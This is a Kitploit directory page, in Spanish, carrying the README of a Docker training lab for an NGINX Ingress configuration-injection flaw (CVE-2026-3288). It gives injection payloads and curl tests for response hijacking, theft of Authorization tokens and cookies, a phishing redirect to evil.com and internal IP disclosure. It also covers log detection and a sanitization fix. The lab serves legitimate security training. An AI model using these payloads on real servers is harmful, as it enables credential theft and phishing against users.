Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-3288-lab — # Laboratorio vulnerable basado en Docker para CVE-2026-3288, inyección de configuración en NGINX Ingress, con scripts de explotación, monitoreo de detección y guía de remediación para formación de seguridad autorizada. | Kitploit
Herramientas/GitHubGitHub/bvabhishek/cve-2026-3288-lab
Seguridad de Infraestructura en la NubeSeguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAuditoría de ConfiguraciónPruebas de PenetraciónAprendizaje y Educación
Labs y Práctica
GitHubbvabhishek/cve-2026-3288-lab

CVE-2026-3288-lab

# Laboratorio vulnerable basado en Docker para CVE-2026-3288, inyección de configuración en NGINX Ingress, con scripts de explotación, monitoreo de detección y guía de remediación para formación de seguridad autorizada.

Ver Repositorio
16hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-3288 Laboratorio Vulnerable (Docker)

Inyección de Configuración en NGINX Ingress Controller

⚠️ ADVERTENCIA: Este laboratorio contiene configuraciones intencionalmente vulnerables para SOLO ENTRENAMIENTO DE SEGURIDAD AUTORIZADO

Resumen de la Vulnerabilidad

CVE-2026-3288 (CVSS 8.8 ALTO) - Inyección de configuración en NGINX Ingress Controller

  • Versiones Afectadas: < v1.13.8, v1.14.4, v1.15.0
  • Vector de Ataque: Inyección de comillas dobles (") en la configuración de rutas
  • Impacto: Ejecución Remota de Código, Divulgación de Secretos, Robo de Credenciales
  • Relacionado: CVE-2026-24512 (inyección de ruta similar)

Causa Raíz

La función buildProxyPass() no sanitiza la entrada de rutas antes de interpolar en la configuración de nginx, permitiendo a los atacantes escapar de cadenas entre comillas e inyectar directivas arbitrarias de nginx.

Componentes del Laboratorio

root@kitploit:~
CVE-2026-3288-lab/
├── README.md                          # Este archivo
├── docker-compose.yml                 # Configuración principal del laboratorio
├── docker/
│   ├── nginx/
│   │   ├── Dockerfile                # Configuración NGINX vulnerable
│   │   ├── nginx.conf                # Configuración base
│   │   └── vulnerable-config.conf    # Manejo de rutas vulnerable
│   └── backend/
│       ├── Dockerfile                # Aplicación backend simple
│       └── app.py                    # Aplicación Flask
├── exploits/
│   ├── exploit.py                    # Script de explotación automatizado
│   ├── payloads.txt                  # Colección de payloads de explotación
│   └── test-exploits.sh              # Probar todos los exploits
├── detection/
│   └── monitor-logs.sh               # Monitorear intentos de explotación
└── cleanup/
    └── cleanup.sh                    # Eliminar todos los recursos del laboratorio

Requisitos Previos

  • Docker instalado
  • Docker Compose instalado
  • Python 3.6+ (para scripts de explotación)
  • curl o wget
  • Mínimo 2GB de RAM

Inicio Rápido

1. Iniciar el Laboratorio

root@kitploit:~
cd CVE-2026-3288-lab

# Iniciar entorno vulnerable
docker-compose up -d

# Verificar estado
docker-compose ps

2. Verificar Instalación

root@kitploit:~
# Probar que el backend está funcionando
curl http://localhost:8080/

# Probar que NGINX está funcionando
curl http://localhost/

3. Ejecutar Exploits

root@kitploit:~
cd exploits

# Explotación automatizada
python3 exploit.py --all

# O probar exploits individuales
bash test-exploits.sh

4. Monitorear Logs

root@kitploit:~
# Ver logs de NGINX para explotación
docker-compose logs -f nginx

# Monitorear detección
cd detection
bash monitor-logs.sh

5. Limpieza

root@kitploit:~
docker-compose down -v

Escenarios de Ataque

Escenario 1: Secuestro de Respuesta

Inyectar la directiva return de nginx para servir contenido controlado por el atacante.

Payload:

root@kitploit:~
/api" return 200 "HACKED BY ATTACKER

Prueba:

root@kitploit:~
curl 'http://localhost/api" return 200 "HACKED'

Escenario 2: Robo de Credenciales

Reflejar los encabezados de Authorization en la respuesta para robar tokens Bearer.

Payload:

root@kitploit:~
/login" return 200 "Token: $http_authorization

Prueba:

root@kitploit:~
curl -H "Authorization: Bearer secret123" 'http://localhost/login" return 200 "Token: $http_authorization'

Escenario 3: Redirección de Phishing

Redirigir a los usuarios a un sitio de phishing controlado por el atacante.

Payload:

root@kitploit:~
/" return 302 "https://evil.com/phishing

Prueba:

root@kitploit:~
curl -I 'http://localhost/" return 302 "https://evil.com/phishing'

Escenario 4: Divulgación de IP Interna

Filtrar información interna del servidor.

Payload:

root@kitploit:~
/" return 200 "Internal IP: $server_addr

Prueba:

root@kitploit:~
curl 'http://localhost/" return 200 "Internal IP: $server_addr'

Escenario 5: Robo de Cookies

Robar cookies de sesión.

Payload:

root@kitploit:~
/" return 200 "Cookies: $http_cookie

Prueba:

root@kitploit:~
curl -H "Cookie: session=abc123" 'http://localhost/" return 200 "Cookies: $http_cookie'

Cómo Funciona

Patrón de Código Vulnerable

root@kitploit:~
# Configuración vulnerable
location ~ "^/api" {
    rewrite "(?i)/api" /backend break;
    proxy_pass http://backend;
}

Explotación

Cuando la ruta contiene ", rompe la cadena entre comillas:

root@kitploit:~
# Entrada del atacante: /api" return 200 "HACKED
# Resultado:
location ~ "^/api" return 200 "HACKED" {
    # La configuración original ahora está rota
}

Detección

Monitoreo de Logs

root@kitploit:~
# Buscar patrones sospechosos
docker-compose logs nginx | grep -E '(return|rewrite|set).*"'

Detección Manual

root@kitploit:~
# Verificar la configuración de NGINX para directivas inyectadas
docker exec cve-2026-3288-nginx cat /etc/nginx/nginx.conf | grep -A5 "location"

Remediación

Acciones Inmediatas

  1. Validación de Entrada - Sanitizar todas las entradas de rutas
  2. Escapar Caracteres Especiales - Escapar correctamente " y \
  3. Usar Listas Permitidas - Solo permitir rutas conocidas y seguras
  4. Monitorear Logs - Alertar sobre patrones sospechosos

Corrección de Código

root@kitploit:~
// Antes (vulnerable)
path := location.Path
config := fmt.Sprintf(`rewrite "(?i)%s" %s break;`, path, target)

// Después (corregido)
path := sanitizeQuotedRegex(location.Path)
config := fmt.Sprintf(`rewrite "(?i)%s" %s break;`, path, target)

Objetivos de Aprendizaje

Después de completar este laboratorio, entenderás:

  1. ✅ Cómo funcionan las vulnerabilidades de inyección de configuración
  2. ✅ El impacto de una sanitización insuficiente de entradas
  3. ✅ Múltiples técnicas de explotación
  4. ✅ Métodos de detección mediante análisis de logs
  5. ✅ Estrategias de remediación adecuadas

Solución de Problemas

Los contenedores no inician

root@kitploit:~
# Ver logs
docker-compose logs

# Reiniciar
docker-compose restart

Puerto ya en uso

root@kitploit:~
# Cambiar puertos en docker-compose.yml
# O detener servicios en conflicto
sudo lsof -i :80

Los exploits no funcionan

root@kitploit:~
# Verificar que NGINX está funcionando
docker-compose ps nginx

# Verificar la configuración de NGINX
docker exec cve-2026-3288-nginx nginx -t

Aviso de Seguridad

  • ⚠️ SOLO usar en entornos de laboratorio aislados
  • ⚠️ NUNCA desplegar en sistemas de producción
  • ⚠️ NUNCA exponer a internet
  • ⚠️ Asegurar la autorización adecuada antes de probar
  • ⚠️ Seguir prácticas de divulgación responsable

Referencias

  • Aviso CVE-2026-3288
  • PR de Corrección #14667
  • Análisis de Sysdig

Creado solo para fines autorizados de entrenamiento e investigación en seguridad

Descargar herramienta